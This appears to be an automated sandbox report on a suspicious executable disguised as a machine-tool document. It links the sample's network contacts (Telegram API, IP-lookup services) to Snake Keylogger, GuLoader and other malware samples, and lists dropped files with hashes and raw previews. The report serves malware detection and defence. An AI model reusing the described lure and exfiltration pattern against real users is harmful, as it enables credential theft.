                                                                                                                                                              • Number of executed functions: 129
                                                                                                                                                              • Number of non-executed functions: 187
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                                                              Warnings

                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                              • VT rate limit hit for: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe

                                                                                                                                                              Simulations

                                                                                                                                                              Behavior and APIs

                                                                                                                                                              No simulations

                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                              IPs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              149.154.167.220Yeni Sipari#U015f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                                                                                                  Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                        ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                          2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                            e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                              YirR3DbZQp.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                qtYuyATh0U.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                  172.67.177.134Payment Advice Note.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                    Confirmation transfer AGS # 03-10-24.scr.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                      Drawing_Products_Materials_and_Samples_IMG.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                        SecuriteInfo.com.FileRepMalware.11227.27096.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                          TransactionDetailsAAED768093.scr.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            PI-005.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                              DHL Package.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                  z65PurchaseOrderNo_0072024_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                    rSWIFT.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                      132.226.247.73Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                                                                      2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                                                                      VX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                                                                      jHSDuYLeUl.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                                                                      Quote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                                                                      INVOICE-COAU7230734290.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                                                                      Urgent inquiry for quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                                                                      Payment Advice - Advice Ref pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                                                                      Ziraat Bankasi Swift Mesaji_20241003_3999382.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                                                                      MT103-93850.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • checkip.dyndns.org/

                                                                                                                                                                                                      Domains

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      checkip.dyndns.com8038.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 132.226.8.169
                                                                                                                                                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                                                                                                                                      • 132.226.8.169
                                                                                                                                                                                                      #Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 158.101.44.242
                                                                                                                                                                                                      movimiento_INGDIRECT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 193.122.130.0
                                                                                                                                                                                                      Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 193.122.6.168
                                                                                                                                                                                                      Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 132.226.247.73
                                                                                                                                                                                                      sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                      • 158.101.44.242
                                                                                                                                                                                                      ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 193.122.6.168
                                                                                                                                                                                                      2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 132.226.247.73
                                                                                                                                                                                                      VX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 132.226.247.73
                                                                                                                                                                                                      api.telegram.orgYeni Sipari#U015f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      YirR3DbZQp.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      qtYuyATh0U.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      reallyfreegeoip.org8038.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                      #Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      movimiento_INGDIRECT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                      Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                      Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      VX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.96.3

                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      TELEGRAMRUYeni Sipari#U015f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                      e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      YirR3DbZQp.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      CLOUDFLARENETUSQUOTATIONS#08673.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                                                      t5985gRtZo.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 172.67.176.65
                                                                                                                                                                                                      Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 23.227.38.74
                                                                                                                                                                                                      8038.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                      https://sneamcomnnumnlty.com/h474823487284/geting/activeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 104.21.72.124
                                                                                                                                                                                                      https://pub-3432fdbad0cc4319a435ac6e41d4a0f1.r2.dev/scrpt.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                      • 172.66.0.235
                                                                                                                                                                                                      https://pub-7571f8ffd5b243f892961d4b09c69e36.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                      • 172.66.0.235
                                                                                                                                                                                                      https://pub-e8583bd7c3574b5b8171769cd95518de.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                      • 104.17.25.14
                                                                                                                                                                                                      https://pub-92d27a69cbfc4f16942faf2ba89c0aa3.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                      • 104.17.25.14
                                                                                                                                                                                                      UTMEMUS8038.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 132.226.8.169
                                                                                                                                                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                                                                                                                                      • 132.226.8.169
                                                                                                                                                                                                      Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 132.226.247.73
                                                                                                                                                                                                      2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 132.226.247.73
                                                                                                                                                                                                      VX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 132.226.247.73
                                                                                                                                                                                                      jHSDuYLeUl.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 132.226.247.73
                                                                                                                                                                                                      na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                                                                                                                                      • 132.226.8.169
                                                                                                                                                                                                      Quote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 132.226.247.73
                                                                                                                                                                                                      INVOICE-COAU7230734290.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 132.226.247.73
                                                                                                                                                                                                      Confirmation transfer AGS # 03-10-24.scr.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                      • 132.226.8.169

                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      54328bd36c14bd82ddaa0c04b25ed9ad8038.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                                                      #Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                                                      movimiento_INGDIRECT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                                                      Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                                                      Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                                                      sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                                                      ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                                                      2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                                                      VX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eRFQ-350548 P1-00051538.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      QUOTATIONS#08673.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      RFQ-350548 P1-00051538.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      Yeni Sipari#U015f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      https://pub-3432fdbad0cc4319a435ac6e41d4a0f1.r2.dev/scrpt.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      https://pub-c32e86b2348440f0b4bcf91d16f22053.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      MAVI VATAN - VSL's DETAILS.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19t5985gRtZo.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
                                                                                                                                                                                                      ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
                                                                                                                                                                                                      0urFbKxdvL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
                                                                                                                                                                                                      zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
                                                                                                                                                                                                      file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
                                                                                                                                                                                                      setup_installer.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
                                                                                                                                                                                                      file.dllGet hashmaliciousMatanbuchusBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
                                                                                                                                                                                                      file.dllGet hashmaliciousMatanbuchusBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
                                                                                                                                                                                                      zR4aIjCuRs.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225
                                                                                                                                                                                                      buildz.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                                                                                                      • 142.250.80.46
                                                                                                                                                                                                      • 142.250.65.225

                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dlllt0Bl5kc0e.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                        lt0Bl5kc0e.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                          Orden de Compra.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                            Orden de Compra.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                              rSWIFT.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                rSWIFT.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                  DHL EXPORT.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                    DHL EXPORT.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                      Revised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse

                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Settings.ini

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):50
                                                                                                                                                                                                                        Entropy (8bit):4.558562939644915
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:RlvjDkAQLQIfLBJXmgxv:R1ZQkIP2I
                                                                                                                                                                                                                        MD5:A6216EF9FBE57B11DEEB1B1FD840C392
                                                                                                                                                                                                                        SHA1:E554348623EF9ADDDE2FB3F2742D5CC1EF240AB1
                                                                                                                                                                                                                        SHA-256:EDF6C9DA71DAF3B3DA2E89A1BC6B9F4B812F18FC133CF4706A3AE983E4040946
                                                                                                                                                                                                                        SHA-512:AF5FDD8419B8384361BBEA7600B4DA7860771DD974D3B2D747C6E1C4F7E4DF49FE4BE5FA2320E9041343C8D2AB5912BE1CF279B61ED2A96954C1C2ED05AA0122
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                                        Preview:[Common]..Windows=user32::EnumWindows(i r1 ,i 0)..

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):11264
                                                                                                                                                                                                                        Entropy (8bit):5.770335399747744
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:BPtkumJX7zB22kGwfy0mtVgkCPOse1un:u702k5qpdseQn
                                                                                                                                                                                                                        MD5:4D3B19A81BD51F8CE44B93643A4E3A99
                                                                                                                                                                                                                        SHA1:35F8B00E85577B014080DF98BD2C378351D9B3E9
                                                                                                                                                                                                                        SHA-256:FDA0018AB182AC6025D2FC9A2EFCCE3745D1DA21CE5141859F8286CF319A52CE
                                                                                                                                                                                                                        SHA-512:B2BA9C961C0E1617F802990587A9000979AB5CC493AE2F8CA852EB43EEAF24916B0B29057DBFF7D41A1797DFB2DCE3DB41990E8639B8F205771DBEC3FD80F622
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                        • Filename: lt0Bl5kc0e.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: lt0Bl5kc0e.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Orden de Compra.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Orden de Compra.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: rSWIFT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: rSWIFT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: DHL EXPORT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: DHL EXPORT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Revised PI_2024.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...V..V...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs\Perruque.ing

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):86048
                                                                                                                                                                                                                        Entropy (8bit):1.2588853328265353
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:J0z6wdM0UhwfIaiNOwn6bSGd014Z8uxG:JcsGdu4Zy
                                                                                                                                                                                                                        MD5:DDD2489DDFC524E9EE509A9F23FB902B
                                                                                                                                                                                                                        SHA1:B9B6684CA4D8A8B995C1603E7C19726784EEE000
                                                                                                                                                                                                                        SHA-256:4C232E2ECF884CFB880063A1965E3BDB9A6C79F2FA92CD88F6C7E6779E6DA73B
                                                                                                                                                                                                                        SHA-512:BAB10F980BF0DF1E2801A7198836604BDDA1565D798CBA5917FE74FF9A7575738AA9A28484496F9057CCD6916C1A76851264BF6ABD0112323714D5457C0D41E4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:.............................Q..................................................t................=..................T..C........................................j....................................}.....................................................h..............................................A......d.......................................>.............(.....+........................@.......................K............................_..........................................q.............................................>...).................}.....................?......m...6.....................................P..................................................%.....................X................................... ................y..............................K......................................................a.................6..................!...........s............................{...............................................................s...................

                                                                                                                                                                                                                        C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs\Shrapnelen.Mye

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):368164
                                                                                                                                                                                                                        Entropy (8bit):7.623039146577399
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:WJvjV3qwOFGkUWbNGKzNvROY80A+87aBjci6h6WYISRWP0orkadn:WxArFGkUMAJYx/8aBjcZMWYIOWcwkadn
                                                                                                                                                                                                                        MD5:36BB7469E45CC4B996211E55CEF3FA3C
                                                                                                                                                                                                                        SHA1:1B99C8904ED078AB68BD7FD102FA9858B4934178
                                                                                                                                                                                                                        SHA-256:2FFE647E7B470C383C0A750B2D4E6D793E0FD17ED98CC21713468DC0B8C0C849
                                                                                                                                                                                                                        SHA-512:BD7EBFCEE38C06F509AD901C8A631916988BE9DD3AC45A305E815B3F7C72BA3F80310BF0571175769E9D65D66F11BC29649C6EB7DC0B6CB09B540F57DBD20799
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:..................y......))../....q.........................BB.//...................................X..........U..ttt.......,.......C..``............._..................VV..........,,,......<.......}.oooo...`.........H........#...............[.........#####..XX............RRRRRR..88........@.PP..DDD....,.......f.fff.........................".ccccccc.............o.........8.o.QQ.......7.......``.........1.&&..xxxx.....``........qq.S..555.I...........o.((.....U.......,.....::.........88...1............................e.......................&&&&.".Z.........Z.....)...................................g.........**.................V..==..........xxx.QQQ........66...$$$$.......................c............:.......................................................".......<<......>........ ....f..5.......-..GG......... ....YYYYY..........t.......\\\\......i.66.............................................yy............V.................cc.;.......**.LL......\\\..\...................>..............

                                                                                                                                                                                                                        C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs\Slettelandene.chr

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):162181
                                                                                                                                                                                                                        Entropy (8bit):1.2617911951735907
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:9bJxjjqJeE5S9s6szcH7FgY8bY4wt29WrBWstS2uVFyIRT63fBmdzzjIWEzHX+Ln:bx6v54sbUFOY928thNPCQWE9Q
